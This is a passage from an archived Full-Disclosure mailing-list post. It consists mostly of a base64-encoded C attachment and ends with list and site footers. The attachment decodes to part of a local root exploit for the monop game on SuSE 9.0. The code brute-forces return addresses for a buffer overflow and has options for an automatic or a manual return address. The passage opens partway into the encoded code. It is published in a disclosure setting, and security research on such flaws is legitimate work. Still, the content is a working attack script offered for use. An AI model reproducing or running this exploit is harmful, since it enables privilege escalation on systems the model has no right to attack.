ZyBpbnQgaTsKdW5zaWduZWQgbG9uZyBmb3VuZDsKdW5zaWduZWQgbG9uZyBy
ZXQ7CmZwcmludGYoc3Rkb3V0LCJbK10gQnJ1dGVmb3JjZSBTdGFydGluZyEh
IVxuIik7CmZvcihpID0gZmlyc3RyZXQgOyBpPDAgOyBpKz1ERUMpCiAgICAg
ewogICAgIGZwcmludGYoc3Rkb3V0LCJbK10gVGVzdGluZyBSZXQgQWRkcmVz
cyAweCV4XG4iLGkpOwogICAgIG1ha2VfYnVmZmVyKGkpOwogICAgIGZvdW5k
ID0gY2hpbGRfcHJvY2VzcygpOwogICAgIHVzbGVlcCg5OTkpOwogICAgIAog
ICAgICBpZihmb3VuZCA9PSAwKQogICAgICAgIHsgcHJpbnRmKCJSZXQgQWRy
ZXNzIEZvdW5kID0gMHgleFxuIixpKTsKCSAgYnJlYWs7Cgl9CiAgICB9CiAg
IHJldHVybigwKTsKIH0gICAKCnZvaWQgYmFubmVyKGNoYXIgKmFyZ3YwKQp7
cHJpbnRmKCJTdXNlIDkuMCAvdXNyL2dhbWVzL21vbm9wIExvY2FsIFhwbG9p
dFxuIik7CiBwcmludGYoIjR1dGgwcjogTjRySzA3SVhcbiIpOwogcHJpbnRm
KCI9PiBuYXJrb3RpeEBsaW51eG1haWwub3JnXG4iKTsKIHByaW50ZigiQnJ1
dGVmb3JjZSBtb2RlPT4gJXMgLWJcbiIsYXJndjApOwogcHJpbnRmKCJNYW51
ZWwgUmV0IG1vZGU9PiAlcyAtYSBSRVRcbiIsYXJndjApOwogCiB9CiBtYWlu
KGludCBhcmdjLCBjaGFyICphcmd2W10pCiB7CiAgY2hhciAqb3B0aW9ubGlz
dCA9ICJiYTpoOiI7CiAgaW50IG9wdGlvbjsKICB1bnNpZ25lZCBsb25nIHN0
YXJ0ID0gQlJVVEVfU1RBUlQ7CiAgdW5zaWduZWQgbG9uZyBjaG9vc2U7CiAg
aW50IHVfcl9zY3JpcHRfa2lkZHkgPSAwOwogIGludCBPcHRlcnIgPSAxOwog
IGJhbm5lcihhcmd2WzBdKTsKICBpZihhcmdjIDwgMikKICBmcHJpbnRmKHN0
ZGVyciwiVXNlIC1oIGZvciBoZWxwXG4iKTsKICB3aGlsZSggKG9wdGlvbiA9
IGdldG9wdChhcmdjLGFyZ3Ysb3B0aW9ubGlzdCkgKSAhPSAtMSkKICAgICAg
IHN3aXRjaChvcHRpb24pCiAgICAgICAgeyAKCSAgY2FzZSAnYic6CgkgICB1
X3Jfc2NyaXB0X2tpZGR5PTE7CgkgICBicmVhazsKCSAgCgkgIGNhc2UgJ2gn
OgoJICAgYmFubmVyKGFyZ3ZbMF0pOwoJICAgYnJlYWs7IAoJICAgCgkgIGNh
c2UgJ2EnOgogICAgICAgICAgIGNob29zZSA9IHN0cnRvdWwob3B0YXJnLE5V
TEwsMCk7CiAgICAgICAgICAgbWFrZV9idWZmZXIoY2hvb3NlKTsKICAgICAg
ICAgICBjaGlsZF9wcm9jZXNzKCk7CiAgICAgICAgICAgZXhpdCgwKTsKICAg
ICAgICAgICBicmVhazsKCSAgCgkgIGNhc2UgJz8nOgoJICAgZnByaW50Zihz
dGRlcnIsIlVua25vd24gT3B0aW9uIHVzZSAtaCBmb3IgaGVscFxuIik7Cgkg
ICBiYW5uZXIoYXJndlswXSk7CgkgICBleGl0KC0xKTsKCSAgIAoJICBkZWZh
dWx0OgoJICAgYmFubmVyKGFyZ3ZbMF0pOwoJICAgZXhpdCgtMSk7Cgl9CiAg
IGlmKHVfcl9zY3JpcHRfa2lkZHkpCiAgICAgYnJ1dGVmb3JjZShzdGFydCk7
CiAgICAgIHJldHVybiAwOwp9ICAgIAo=

------------=_1082214415-23418-0--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC